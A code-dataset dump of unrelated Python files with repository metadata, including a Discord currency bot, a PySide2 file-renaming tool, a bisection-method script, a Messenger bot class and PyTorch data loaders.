            "You bet ${0} on the {1} horse, but the {2} horse won instead. You lost your bet.",
            "You went with your friend's vote of the {1} horse, betting ${0}, but you lost your bet when the {2} horse won.",
            "You bet ${0} on the {1} horse, but {2} won instead."
        ]
        colours = ["red", "green", "blue"]
        if amount > get_balance(ctx.author.id):
            await ctx.send(":x: B-baka! You can't gamble more than what you have!")
            # Invalid bet: refund the cooldown so the attempt isn't wasted.
            ctx.command.reset_cooldown(ctx)
            return
        if not colour.lower() in colours:
            await ctx.send(
                ":x: I-I'm sorry, that is not a valid colour! The valid options are: `{}`".format("`, `".join(colours)))
            ctx.command.reset_cooldown(ctx)
            return
        if amount <= 0:
            await ctx.send(":x: Seriously...")
            ctx.command.reset_cooldown(ctx)
            return
        # Winning horse is drawn uniformly; payout is 80% of the stake.
        c = random.choice(colours)
        gains = (amount * 0.80)
        db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
                             charset='utf8mb4')
        cur = db.cursor()
        if c == colour.lower():
            await ctx.send(f":tada: {random.choice(winmsgs).format(amount, colour, round(gains))}")
            cur.execute(f'UPDATE profiles SET bal = bal + {round(gains)} WHERE userid = {ctx.author.id}')
        else:
            await ctx.send(f":sob: {random.choice(losemsgs).format(amount, colour, c)}")
            cur.execute(f'UPDATE profiles SET bal = bal - {amount} WHERE userid = {ctx.author.id}')
        db.commit()
        db.close()
    @commands.command()
    @commands.cooldown(rate=1, per=43200, type=commands.BucketType.user)  # once per 12h (daily is 24h)
    async def crime(self, ctx):
        """Commit a crime! This has a larger chance of failing but has a lower ratelimit than daily with a higher payout.
        Note: this command requires you to have a minimum balance of $300!"""
        losses = [
            "You took candy from a baby... and felt bad about it. You lost ${}.",
            "You got caught by the FBI. Pay ${} to get out of jail",
            "Your memes are terrible. You get ${} taken away because of it."
        ]
        wins = [
            "You successfully robbed a bank for ${}.",
            "You did the thing. Congratulations. You got ${}"
        ]
        # 1-in-5 chance of success (n == 1 below).
        n = random.randint(1, 5)
        if get_balance(ctx.author.id) < 300:
            await ctx.send(":x: You can't commit a crime without the $300 to fund it.")
            return
        db = pymysql.connect(config['db']['ip'], config['db']['user'], config['db']['password'], config['db']['name'],
                             charset='utf8mb4')
        cur = db.cursor()
        # The amount won or lost is drawn from the same range either way.
        money = random.randint(150, 300)
        if n == 1:
            await ctx.send(f":tada: {random.choice(wins).format(money)}")
            cur.execute(f'UPDATE profiles SET bal = bal + {money} WHERE userid = {ctx.author.id}')
        else:
            cur.execute(f'UPDATE profiles SET bal = bal - {money} WHERE userid = {ctx.author.id}')
            await ctx.send(f":sob: {random.choice(losses).format(money)}")
        db.commit()
        db.close()
def setup(bot):
    """discord.py extension entry point: attach the Currency cog to the bot."""
    bot.add_cog(Currency(bot))
| UTF-8 | Python | false | false | 17,276 | py | 16 | currency.py | 15 | 0.532866 | 0.522789 | 0 | 368 | 44.921196 | 194 |
Kaemer1645/Numerator | 11,544,872,118,891 | 15b3d72807a52d714883572e3a88f947f6deb6de | ca360ae75cd82c0836b072dd6b446986b6e96301 | /gui.py | d7c14c882396172dd1940def3fb5b251664d50ce | [] | no_license | https://github.com/Kaemer1645/Numerator | aec2dfd37af7c98ae61dae9a5b664f516fa15c7a | b5ddd87b4ac64328f97eaf954c731647d95226dc | refs/heads/main | 2023-02-06T08:13:33.232973 | 2020-12-23T22:01:52 | 2020-12-23T22:01:52 | 310,949,513 | 0 | 0 | null | false | 2020-11-14T23:16:47 | 2020-11-07T23:19:35 | 2020-11-08T13:04:56 | 2020-11-14T23:16:46 | 17 | 0 | 0 | 0 | Python | false | false | # This Python file uses the following encoding: utf-8
import sys, shutil
from PySide2.QtUiTools import QUiLoader
from PySide2.QtWidgets import QApplication, QFileDialog, QPushButton, QLineEdit
from PySide2 import QtXml
from PySide2.QtCore import QFile, QIODevice
from PySide2 import QtXml
from numerator import Numerator#, Numerator_run
import webbrowser
class Main:
    """Loads the Qt Designer form (dialog.ui), wires its widgets and drives
    the Numerator renaming engine (dry run via `engine`, real run via
    `execution`)."""

    def __init__(self):
        # Load the .ui form at runtime; abort if it cannot be read or parsed.
        ui_file_name = "dialog.ui"
        ui_file = QFile(ui_file_name)
        if not ui_file.open(QIODevice.ReadOnly):
            print("Cannot open {}: {}".format(ui_file_name, ui_file.errorString()))
            sys.exit(-1)
        loader = QUiLoader()
        self.window = loader.load(ui_file)
        ui_file.close()
        if not self.window:
            print(loader.errorString())
            sys.exit(-1)
        self.window.show()

    #def silnik(self):
        #test = (self.selectDirectory(), self.first_file(),self.new_file_name(),self.first_number(), self.steps(),self.file_type())
        #return print(test)

    def engine(self):
        """Dry run: print the planned renames without touching any file."""
        #print(self.directory())
        self.numerator = Numerator(directory=self.directory(), first_file=self.first_file(),
                                   prefix=self.new_file_name(), first_number=self.first_number(),
                                   step=self.steps(), file_type=self.file_type())
        check = self.numerator.run() # store the result here: iterating numerator.run() directly below would run the engine twice
        for file in check:
            print('Change from "%s" to "%s"'% (file[0],file[1]))
        '''for single_print in self.numerator.run():
            print(single_print)'''

    def execution(self):
        """Real run: print each rename and perform it with shutil.move."""
        self.exec = Numerator(directory=self.directory(), first_file=self.first_file(),
                              prefix=self.new_file_name(), first_number=self.first_number(),
                              step=self.steps(), file_type=self.file_type())
        change = self.exec.run()
        for exec_file in change:
            print('Change from "%s" to "%s"'% (exec_file[0],exec_file[1]))
            shutil.move(exec_file[0],exec_file[1])

    def selectDirectory(self):
        """Open a directory picker and write the choice into the path line edit."""
        #dialog = QFileDialog()
        directory = str(QFileDialog.getExistingDirectory())
        self.window.le_dir.setText('{}'.format(directory))
        #return print(directory)

    # def print_dir(self):
    #     pri = self.window.le_dir.text()
    #     return print(pri)

    def directory(self):
        # Directory chosen by the user (text of the path line edit).
        dir_text = self.window.le_dir.text()
        return dir_text

    def first_file(self):
        # Name of the first file to renumber.
        label = self.window.le_first_file.text()
        return label

    def first_number(self):
        # Starting number of the new sequence.
        number = self.window.le_file_number.text()
        return int(number)

    def new_file_name(self):
        # Prefix used for the renamed files.
        prefix = self.window.le_prefix.text()
        return prefix

    def steps(self):
        # Increment between consecutive file numbers.
        steps = self.window.le_step.text()
        return int(steps)

    def file_type(self):
        # File extension filter typed by the user.
        type = self.window.le_file_type.text()
        return type

    def github(self):
        """Open the project's GitHub page in the default browser."""
        open = webbrowser.open('https://github.com/Kaemer1645/Numerator')
        return open

    def run(self):
        """Connect the form's buttons to their handlers."""
        self.window.pb_dir.clicked.connect(self.selectDirectory)
        #self.window.pb_dir.clicked.connect(self.silnik)
        self.window.pb_test.clicked.connect(self.engine)
        #self.window.pb_run.clicked.connect(self.print_dir)
        self.window.pb_run.clicked.connect(self.execution)
        self.window.pb_github.clicked.connect(self.github)
if __name__ == "__main__":
    # Standard Qt bootstrap: build the application and the main window,
    # wire the buttons, then hand control to the event loop.
    app = QApplication([])
    inst = Main()
    inst.run()
    sys.exit(app.exec_())
| UTF-8 | Python | false | false | 3,667 | py | 5 | gui.py | 4 | 0.602672 | 0.597764 | 0 | 103 | 34.601942 | 131 |
daniel-reich/turbo-robot | 4,612,794,887,956 | fc668b0f4beb102abcf466f2f54e0323dd94b77f | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /k9usvZ8wfty4HwqX2_2.py | 6df3da8982061b94fd50d4d07581a39b1c4e148e | [] | no_license | https://github.com/daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Create a function to check whether a given number is **Cuban Prime**. A cuban
prime is a prime number that is a solution to one of two different specific
equations involving third powers of x and y. For this challenge we are only
concerned with the cuban numbers from the **first equation**. We **ignore**
the cuban numbers from the **second equation**.
### Equation Form
p = (x^3 - y^3)/(x - y), x = y + 1, y > 0
... and the first few cuban primes from this equation are 7, 19, 37, 61, 127,
271.
### Examples
cuban_prime(7) ➞ "7 is cuban prime"
cuban_prime(9) ➞ "9 is not cuban prime"
cuban_prime(331) ➞ "331 is cuban prime"
cuban_prime(40) ➞ "40 is not cuban prime"
### Notes
* The inputs are positive integers only.
* Check the **Resources** for help.
"""
def is_prime(p):
    """Return True if p is prime (trial division up to sqrt(p)).

    PEP 8 discourages binding a lambda to a name; a def keeps the same
    behaviour and gives the function a proper name and docstring.
    """
    return p > 1 and all(p % i for i in range(2, int(p ** 0.5 + 1)))
def cuban_prime(n):
    """Return '<n> is cuban prime' or '<n> is not cuban prime'.

    A (first-equation) cuban prime is a prime of the form
    p = (x^3 - y^3) / (x - y) with x = y + 1, which simplifies to
    p = 3y^2 + 3y + 1. Instead of scanning every y < n (O(n)), solve the
    quadratic for y directly and verify the candidate exactly, which makes
    the check O(sqrt(n)) (dominated by the primality test).
    """
    def _is_prime(p):
        return p > 1 and all(p % i for i in range(2, int(p ** 0.5 + 1)))

    # 3y^2 + 3y + 1 = n  =>  y = (-3 + sqrt(12n - 9 + 12)) / 6; use float
    # sqrt for the estimate, then verify integer candidates exactly so a
    # rounding error cannot change the answer.
    disc = 12 * n - 3
    if disc >= 0:
        y = round((disc ** 0.5 - 3) / 6)
        for cand in (y - 1, y, y + 1):
            if cand > 0 and 3 * cand * cand + 3 * cand + 1 == n and _is_prime(n):
                return str(n) + ' is cuban prime'
    return str(n) + ' is not cuban prime'
| UTF-8 | Python | false | false | 1,045 | py | 8,294 | k9usvZ8wfty4HwqX2_2.py | 8,294 | 0.644444 | 0.605797 | 0 | 39 | 25.461538 | 77 |
alexisdenisew/finalproj | 17,798,344,500,159 | 5c3d355db23dce040139a7fcece8c5c3e9beda85 | adad38555b9fa6857e1e5ef697d84a16b91b986e | /bubble/peepthis/apps.py | 87dcaf3566d3693cc847bcee784437920d61decd | [] | no_license | https://github.com/alexisdenisew/finalproj | 6723d71a123a9509dae9ef9c72c47633d12e22bc | 7d25a3934474198fa5e357750447ccbaf95d8a53 | refs/heads/master | 2021-01-20T02:22:49.518058 | 2017-08-24T16:40:21 | 2017-08-24T16:40:21 | 101,317,949 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.apps import AppConfig
class PeepthisConfig(AppConfig):
    """Django application configuration for the `peepthis` app."""
    name = 'peepthis'
| UTF-8 | Python | false | false | 91 | py | 14 | apps.py | 3 | 0.758242 | 0.758242 | 0 | 5 | 17.2 | 33 |
mramirid/Metode_Numerik | 5,171,140,624,888 | 68295d1111f468c2bde405c11f26ed6efd5d76ae | df0e76ed7314475123a1adfe72b7010faacd3152 | /Biseksi.py | f955c2e7c5d67c99cd1c6444a89c27a5f91346e7 | [] | no_license | https://github.com/mramirid/Metode_Numerik | 4963610c87300807b1d204beb0b318fe74fcc383 | f1c741941b288a32da04ac68da71aee652f72546 | refs/heads/master | 2020-04-03T01:08:03.052475 | 2019-01-10T12:58:20 | 2019-01-10T12:58:20 | 154,920,536 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 25 20:50:25 2018
@author: mramirid
Metode biseksi; f(x) = x^2 - e^x + 5
"""
import pandas as pd
from Fitur.parser import Parser
from Fitur.plot import Plot
persamaan = input('Persamaan\t: ')  # the equation f(x) to solve
batas_bawah = float(input('Batas bawah\t: '))  # lower bound a
batas_atas = float(input('Batas atas\t: '))  # upper bound b
# Create the parser object
parser = Parser()
# Set the equation f(x)
parser.set_function(persamaan)
# If f(a) * f(b) > 0 there is no sign change in [a, b], so the bisection
# method cannot bracket a root: stop.
if (parser.function(batas_bawah) * parser.function(batas_atas)) > 0:
    print("Tidak ada akar di dalam rentang tersebut!")
    exit()
# Build the iteration table
df = pd.DataFrame(columns = ['a', 'b', 'x', 'f(x)', 'f(a)', 'Keterangan', 'Error'])
# Initialise the first row with the interval midpoint
x = (batas_bawah + batas_atas) / 2
fx = parser.function(x)
fa = parser.function(batas_bawah)
keterangan = 'Berlainan tanda' if fx * fa < 0 else ''
df.loc[0] = [batas_bawah, batas_atas, x, fx, fa, keterangan, abs(fx)]
toleransi = 10e-07  # stopping tolerance on |f(x)| (i.e. 1e-6)
index = 1
while abs(fx) > toleransi:
    # Keep the half-interval where the sign change (and hence the root) lies.
    if fa * fx < 0:
        batas_atas = x
    else:
        batas_bawah = x
    x = (batas_bawah + batas_atas) / 2
    fx = parser.function(x)
    fa = parser.function(batas_bawah)
    keterangan = 'Berlainan tanda' if fx * fa < 0 else ''
    # Append a row for this iteration
    df.loc[index] = [batas_bawah, batas_atas, x, fx, fa, keterangan, abs(fx)]
    index += 1
plot = Plot()
plot.buat_kurva(x, persamaan)
plot.tampilkan_kurva()
# Show every column; by default pandas abbreviates wide frames
pd.set_option('display.max_columns', 7)
print()  # blank line before the table
print(df)
print('\nRoot\t: %.8f' % x)
print('Error\t: %.8f' % abs(fx))
KowalskiThomas/PyMessenger | 11,450,382,841,626 | 24e509749f10cbf1ebaa3afd1e383dd7387fd5b2 | 0a8ee7e412d2c81c9c34135f190ea7b75dc5f04b | /bot.py | 73e7a329880e0a6ff89cb45590d8bc368cb8b5a4 | [] | no_license | https://github.com/KowalskiThomas/PyMessenger | 3736aa2ce1de17f511018c2dffada058254f3138 | ede15f17fad0223572c577acfebbea5301799f9b | refs/heads/master | 2020-04-21T07:36:43.061761 | 2019-02-24T16:40:33 | 2019-02-24T16:40:33 | 169,396,284 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
from statesmanager import StatesManager
from server import Server
# NotificationType, ContentType, QuickReply
from classes import Message, MessagingEntry
from function_registry import FunctionRegistry
import utils
DEFAULT_API_VERSION = 2.6
class User:
    """Lightweight handle for one Messenger user, bound to the bot that
    received their message; proxies state and send operations to the bot."""

    def __init__(self, bot, id_: int):
        self.id: int = id_
        self.bot: Bot = bot

    def set_state(self, new_state: str):
        # Delegate to the bot's shared StatesManager.
        self.bot.states.set_state(self.id, new_state)

    @property
    def state(self):
        # Current conversation state for this user.
        return self.bot.states.get_state(self.id)

    def send(self, content):
        # Convenience wrapper around Bot.send for this user's id.
        self.bot.send(self.id, content)
# noinspection PyMethodMayBeStatic
class Bot:
    """Messenger bot: receives MessagingEntry objects from the shared Server,
    routes them through quick-reply payload handling and per-state handlers,
    and replies through the Facebook Graph API."""

    handlers = dict()         # state name -> list of handler callables
    states = StatesManager()  # per-user conversation state storage
    server = Server()         # shared webhook server for all Bot instances

    def __init__(self, access_token, app_secret=None, api_version=None):
        Bot.server.register_bot(self)
        self.api_version = api_version if api_version else DEFAULT_API_VERSION
        self.app_secret = app_secret
        self.graph_url = 'https://graph.facebook.com/v{0}'.format(
            self.api_version)
        self.access_token = access_token
        self._auth_args = None  # cache filled lazily by the auth_args property
        self.always_typing_on = False   # auto "typing" indicator per request
        self.always_mark_seen = False   # auto "seen" marker per request

    @property
    def auth_args(self):
        """Query-string auth parameters, built once and cached.

        Bug fix: __init__ always assigns self._auth_args, so the previous
        `if not hasattr(self, '_auth_args')` test was never true and the
        property returned the initial None forever. Test for None instead.
        """
        if self._auth_args is None:
            auth = {
                'access_token': self.access_token
            }
            if self.app_secret is not None:
                appsecret_proof = utils.generate_appsecret_proof(
                    self.access_token, self.app_secret)
                auth['appsecret_proof'] = appsecret_proof
            self._auth_args = auth
        return self._auth_args

    def process_quick_reply(self, entry: MessagingEntry):
        """Interpret a quick-reply payload: 'SetState:<state>' switches the
        sender's state, 'Execute:<ident>' calls a registered function."""
        p = entry.quick_reply_payload
        if not p:
            return
        if p.startswith("SetState:"):
            state = p.split(":")[1]
            print("Setting state to {}".format(state))
            entry.sender.set_state(state)
        elif p.startswith("Execute:"):
            f_ident = p.split(":")[1]
            to_call = FunctionRegistry.get(f_ident)
            if to_call:
                print(
                    "Executing function {} ({})".format(
                        to_call.__name__, f_ident))
                # Set continue_processing before calling the function so the
                # callee can opt back into state-handler processing.
                entry.continue_processing = False
                to_call(entry)
            else:
                print(
                    "Couldn't find function to execute in FunctionRegistry ({}).".format(f_ident))
        else:
            print("Unsupported payload: {}".format(p))

    def process_payloads(self, entry: MessagingEntry):
        """Run all payload processors for an incoming entry."""
        self.process_quick_reply(entry)
        if entry.continue_processing:
            # Placeholder for other payload kinds (postbacks, referrals, ...).
            pass

    def on_request(self, data: MessagingEntry):
        """Entry point called by the Server for every incoming message."""
        data.sender = User(self, data.sender)
        print("Message: {}".format(data.message))
        if self.always_typing_on:
            self.typing_on(data.sender)
        if self.always_mark_seen:
            self.mark_seen(data.sender)
        self.process_payloads(data)
        # Handlers may change user's state and want to immediately call next state's handler
        # That's why we make continue_processing False every time we call a handler, and if the next handler has to be
        # called, the called handler will have made continue_processing True.
        while data.continue_processing:
            state = data.sender.state
            if state in self.handlers:
                for f in self.handlers[state]:
                    data.continue_processing = False
                    f(self, data)
            else:
                print("Unregistered state: {}".format(state))
                # Bug fix: nothing reset continue_processing on this branch,
                # so an unknown state used to spin in an infinite loop.
                data.continue_processing = False
        else:
            # NOTE(review): a while/else clause runs on every non-break exit,
            # so this also prints after normal handling — kept for log
            # compatibility; confirm whether it should be conditional.
            print("State handlers not processed (message already processed).")

    def send(self, user_id, message: Message):
        """Send *message* (a str or Message) to *user_id* via the Send API."""
        # Accept a User handle as well as a raw id, like the action helpers do.
        if isinstance(user_id, User):
            user_id = user_id.id
        if isinstance(message, str):
            message = Message(content=message)
        # Programming-error guard (stripped under -O, like the original).
        assert(isinstance(message, Message))
        payload = {
            "recipient": {
                "id": user_id
            },
            "message": dict(),
            "notification_type": message.notification_type.value,
            "messaging_type": message.message_type.value
        }
        # Only include the optional fields the Message actually carries.
        if message.content:
            payload["message"]["text"] = message.content
        if message.quick_replies:
            payload["message"]["quick_replies"] = [x.to_dict()
                                                   for x in message.quick_replies]
        if message.metadata:
            payload["message"]["metadata"] = message.metadata
        if message.tag:
            payload["tag"] = message.tag
        self.send_raw(payload)

    def _send_action(self, user_id, action):
        """Send one Messenger sender action (shared by the helpers below)."""
        if isinstance(user_id, User):
            user_id = user_id.id
        self.send_raw({
            "recipient": {
                "id": user_id
            },
            "sender_action": action
        })

    def typing_on(self, user_id):
        """Show the typing indicator to the user."""
        self._send_action(user_id, "typing_on")

    def typing_off(self, user_id):
        """Hide the typing indicator."""
        self._send_action(user_id, "typing_off")

    def mark_seen(self, user_id):
        """Mark the user's last message as seen."""
        self._send_action(user_id, "mark_seen")

    def send_raw(self, payload):
        """POST *payload* to the Send API and return the decoded response."""
        request_endpoint = '{0}/me/messages'.format(self.graph_url)
        response = requests.post(
            request_endpoint,
            headers={
                "Authorization": "Bearer {}".format(self.access_token)
            },
            params=self.auth_args,
            json=payload
        )
        result = response.json()
        print(result)
        return result
# Start the shared webhook server as soon as this module is imported.
Bot.server.start()
| UTF-8 | Python | false | false | 6,077 | py | 14 | bot.py | 13 | 0.544841 | 0.543854 | 0 | 202 | 29.084158 | 118 |
HCPLab-SYSU/SSGRL | 2,576,980,411,050 | e2284607c76b2a47965af282653a15e40afc1e71 | f0f444c6d3f7a51a3847baf2983fd35eba2d9702 | /utils/transforms.py | 3cde45c9d55a73408150d681e9254bf25f8447af | [] | no_license | https://github.com/HCPLab-SYSU/SSGRL | 3204addf61917e11c370ecea10b64c7476825441 | ea47ccb2cf55ff37c5a91fc5a6974bdbc9ab6679 | refs/heads/master | 2022-05-20T06:29:26.612648 | 2022-04-27T13:12:25 | 2022-04-27T13:12:25 | 200,573,386 | 164 | 42 | null | false | 2022-01-22T07:01:20 | 2019-08-05T03:09:08 | 2022-01-19T20:28:27 | 2020-05-20T02:07:27 | 3,638 | 135 | 28 | 16 | Python | false | false | from datasets.vgdataset import VGDataset
from datasets.cocodataset import CoCoDataset
from datasets.voc07dataset import Voc07Dataset
from datasets.voc12dataset import Voc12Dataset
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
def get_train_test_set(train_dir, test_dir, train_anno, test_anno, train_label=None, test_label=None,args = None):
    """Build the train/test DataLoaders for the dataset named in args.dataset.

    Training images are resized to args.scale_size, randomly cropped at one of
    five scales, then resized to args.crop_size; test images use a plain
    resize + center crop. Supported datasets: COCO, VG, VOC2007, VOC2012.
    Exits with status 1 on an unknown dataset name.
    """
    print('You will perform multi-scale on images for scale 640')
    normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
    scale_size = args.scale_size
    crop_size = args.crop_size

    # One of five crop sizes is picked at random per training image.
    multi_scale_crop = transforms.RandomChoice(
        [transforms.RandomCrop(size) for size in (640, 576, 512, 384, 320)])
    train_data_transform = transforms.Compose([
        transforms.Resize((scale_size, scale_size)),
        multi_scale_crop,
        transforms.Resize((crop_size, crop_size)),
        transforms.ToTensor(),
        normalize,
    ])
    test_data_transform = transforms.Compose([
        transforms.Resize((scale_size, scale_size)),
        transforms.CenterCrop(crop_size),
        transforms.ToTensor(),
        normalize,
    ])

    # Dispatch table instead of an if/elif chain; both splits use the same class.
    dataset_classes = {
        'COCO': CoCoDataset,
        'VG': VGDataset,
        'VOC2007': Voc07Dataset,
        'VOC2012': Voc12Dataset,
    }
    if args.dataset not in dataset_classes:
        print('%s Dataset Not Found' % args.dataset)
        exit(1)
    dataset_cls = dataset_classes[args.dataset]
    train_set = dataset_cls(train_dir, train_anno, train_data_transform, train_label)
    test_set = dataset_cls(test_dir, test_anno, test_data_transform, test_label)

    train_loader = DataLoader(dataset=train_set,
                              num_workers=args.workers,
                              batch_size=args.batch_size,
                              shuffle=True)
    test_loader = DataLoader(dataset=test_set,
                             num_workers=args.workers,
                             batch_size=args.batch_size,
                             shuffle=False)
    return train_loader, test_loader
| UTF-8 | Python | false | false | 2,995 | py | 15 | transforms.py | 11 | 0.558264 | 0.535893 | 0 | 52 | 56.596154 | 114 |
victorskl/panelapp | 17,643,725,664,771 | 273ff28b8464704d8b37e53dd97a87dd2f51d0d7 | 01df468685c9f393b9559cb68df349ef7abcf5a6 | /panelapp/accounts/tests/test_permissions.py | b6143147770483d8de8b2301c92f3bbdb893eb3b | [
"Apache-2.0"
] | permissive | https://github.com/victorskl/panelapp | 481af901472cd960da2d0abf17239b8d484524be | 4dfdd31f6036db5cb4e692961ef9bcbe92d39a23 | refs/heads/master | 2020-05-07T16:28:08.946472 | 2019-01-23T11:04:41 | 2019-01-23T11:04:41 | 180,684,104 | 1 | 0 | null | true | 2019-04-11T00:28:26 | 2019-04-11T00:28:26 | 2019-04-03T14:24:17 | 2019-04-10T12:20:03 | 4,147 | 0 | 0 | 0 | null | false | false | from django.contrib.auth.models import Group
from accounts.tests.setup import TestMigrations
class PermissionsTest(TestMigrations):
    """Checks that the accounts 0006 migration creates the curation groups."""
    # Migration window exercised by the TestMigrations harness.
    migrate_from = '0005_auto_20170816_0954'
    migrate_to = '0006_auto_20180612_0937'
    app = 'accounts'

    def test_groups(self):
        # Each group must exist exactly once after the migration has run.
        self.assertEqual(Group.objects.filter(name='Site Editor').count(), 1)
        self.assertEqual(Group.objects.filter(name='User Support').count(), 1)
        self.assertEqual(Group.objects.filter(name='File Upload Curation').count(), 1)
| UTF-8 | Python | false | false | 515 | py | 128 | test_permissions.py | 123 | 0.718447 | 0.650485 | 0 | 13 | 38.615385 | 86 |
DPNT-Sourcecode/CHK-tixr01 | 14,705,968,059,264 | 0af4759b2ab7b7bace259c0c365a0f18316e8b64 | f7ee15e1381e7157acd2d01abd5d6c99fab7f565 | /test/solutions/test_checkout_1.py | 70d424bc4e095f6df910aa5d475d00acb2227256 | [
"Apache-2.0"
] | permissive | https://github.com/DPNT-Sourcecode/CHK-tixr01 | 19f7adbd1d584ae9c12546af78a133aaae80bd98 | 82595223b2be38156b87d3c52a1236f07c756f59 | refs/heads/master | 2021-04-03T09:24:54.110120 | 2018-03-10T18:30:29 | 2018-03-10T18:30:53 | 124,686,799 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from lib.solutions.checkout import checkout
import pytest
@pytest.mark.parametrize('test_string, expected_price', [
    ('EE', 80),
    ('EEEEBB', 160),
    ('BEBEEE', 160),
    ('EE', 80)  # NOTE(review): exact duplicate of the first case — presumably meant to cover a different basket; confirm
])
def test_checkout(test_string, expected_price):
    """checkout() should price baskets of E and B SKUs (including offers)."""
    assert checkout(test_string) == expected_price
| UTF-8 | Python | false | false | 278 | py | 3 | test_checkout_1.py | 3 | 0.701439 | 0.665468 | 0 | 12 | 22.166667 | 57 |
anyuhanfei/study_PyQt5 | 10,539,849,761,002 | 5bfe818633912b91cb057908d72c1e625e419e85 | 46bff46d767e16e4b78221db2d040b3346b83c18 | /016~032-QObject/025~026-QObject-类型判定/026-QObject-类型判定-案例.py | 0e143835b730077c0f5228e28f0c7c7e8113ff9d | [] | no_license | https://github.com/anyuhanfei/study_PyQt5 | ef5a537795ff979838481ac2253dfe65b32a7796 | ed9f0595abfde3b0b3ba0f5dce2acd9dc9d2ef1d | refs/heads/master | 2020-12-09T04:24:21.821808 | 2020-06-08T09:52:57 | 2020-06-08T09:52:57 | 233,191,765 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
026-QObject-类型判定-案例
创建一个窗口, 包含多个QLabel或其他控件, 将包含在窗口内所有的QLabel控件, 设置背景色cyan
'''
import sys
from PyQt5.QtWidgets import QWidget, QLabel, QApplication, QPushButton
class Window(QWidget):
    """Demo window: walks its child widgets and tints every QLabel cyan,
    demonstrating runtime type checking with QObject.inherits()."""

    def __init__(self):
        super().__init__()
        self.setWindowTitle('026_QObject_类型判定_案例')
        self.resize(500, 500)
        self.index()

    def index(self):
        # Two labels plus one button, so the type check below has both
        # matching and non-matching children to examine.
        label1 = QLabel(self)
        label1.setText('label 1')
        label1.move(10, 10)
        label2 = QLabel(self)
        label2.setText('label 2')
        label2.move(10, 40)
        btn1 = QPushButton(self)
        btn1.setText('button 1')
        btn1.move(10, 70)
        # self.findChildren(QLabel) would return every QLabel directly, but
        # (since this lesson is about type checking) instead walk all child
        # objects and use inherits() to keep only the QLabel instances.
        for widget in self.children():
            if widget.inherits('QLabel') is True:
                widget.setStyleSheet("background-color: cyan;")
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, show the demo window,
    # and enter the event loop.
    app = QApplication(sys.argv)
    window = Window()
    window.show()
    sys.exit(app.exec_())
| UTF-8 | Python | false | false | 1,281 | py | 274 | 026-QObject-类型判定-案例.py | 271 | 0.605042 | 0.570495 | 0 | 45 | 22.8 | 84 |
Sourabhchrs93/star-wars-api | 12,326,556,183,343 | ea7e008016b2f80a36a1bcfd33df3998d9809751 | a82ae3ca1b7da64e5e0ea224fbf8b89a5f0d4154 | /src/services/db_services.py | 537cda6cb55b753dd0b0fd26f1483d7a50f4dade | [] | no_license | https://github.com/Sourabhchrs93/star-wars-api | ec38a2ecf73bbe6c1e40093adc6063961d335c58 | acd4754643a38f495ae3efab00141a830d33e3d6 | refs/heads/master | 2020-05-23T01:09:41.270738 | 2019-05-15T10:43:37 | 2019-05-15T10:43:37 | 186,583,455 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import csv
class LocalDatabase:
    """Tiny favourites store backed by a plain CSV text file.

    Each record is one line of the form "<type>,<name>,<url>".
    """

    def __init__(self, file_path):
        # Path of the backing CSV file; it is created on the first write.
        self.file_path = file_path

    def is_exist(self, data_str):
        """Return True if *data_str* is already stored as a full record line."""
        line = "{0}\n".format(data_str)
        try:
            with open(self.file_path, 'r') as f:
                return line in f.readlines()
        except FileNotFoundError:
            # No backing file yet means no records yet (previously this
            # raised, which also broke write() on a fresh store).
            return False

    def write(self, data_str):
        """Append *data_str* as a new record.

        Returns True on success, False if the record already exists.
        """
        if self.is_exist(data_str):
            return False
        with open(self.file_path, 'a') as f:
            f.write('{0}\n'.format(data_str))
        return True

    def read(self, fav_type):
        """Return (records, count) for records whose type equals *fav_type*.

        Each record is a {'name': ..., 'url': ...} dict; pass "all" to get
        every record regardless of type.
        """
        out_data = []
        try:
            with open(self.file_path, 'rt') as f:
                for row in csv.reader(f):
                    if fav_type == row[0] or fav_type == "all":
                        out_data.append({'name': row[1], 'url': row[2]})
        except FileNotFoundError:
            pass  # an absent file is simply an empty store
        return out_data, len(out_data)

    def clean(self):
        """Erase all records; return True on success, False on an OS error."""
        try:
            # Opening in 'w' mode truncates the file; the explicit
            # truncate(0) call was redundant.
            with open(self.file_path, 'w'):
                pass
            return True
        except OSError:
            return False
| UTF-8 | Python | false | false | 1,208 | py | 11 | db_services.py | 10 | 0.477649 | 0.471026 | 0 | 44 | 26.454545 | 68 |
elementc/monica-tests-yeagerized | 15,144,054,728,995 | f3ad294ff7176d3a71cc417c0a49933d5b1119bf | 4aae1d0f3e4f862f452e39cd19cf5fa16dfb932b | /pages/dashboard.py | 29f3919bf648465ca5f168ec8130621722aa83f1 | [] | no_license | https://github.com/elementc/monica-tests-yeagerized | 4c3c43fd837dd515ba642eddfc8ec14a313a3f7c | b7528ffc2d3466a9fffc29b064513fefe4373bd3 | refs/heads/master | 2021-01-22T23:58:47.225864 | 2017-11-29T08:11:18 | 2017-11-29T08:11:18 | 102,428,998 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from .header_page import HeaderPage
from selenium.webdriver.common.by import By
class DashboardPage(HeaderPage):
dashboard_selector = (By.CSS_SELECTOR, "div.dashboard")
def initial_status(self):
# make sure there is a dashboard div visible...
self.driver.find_element(*self.dashboard_selector)
HeaderPage.initial_status(self)
| UTF-8 | Python | false | false | 360 | py | 24 | dashboard.py | 24 | 0.725 | 0.725 | 0 | 10 | 35 | 59 |
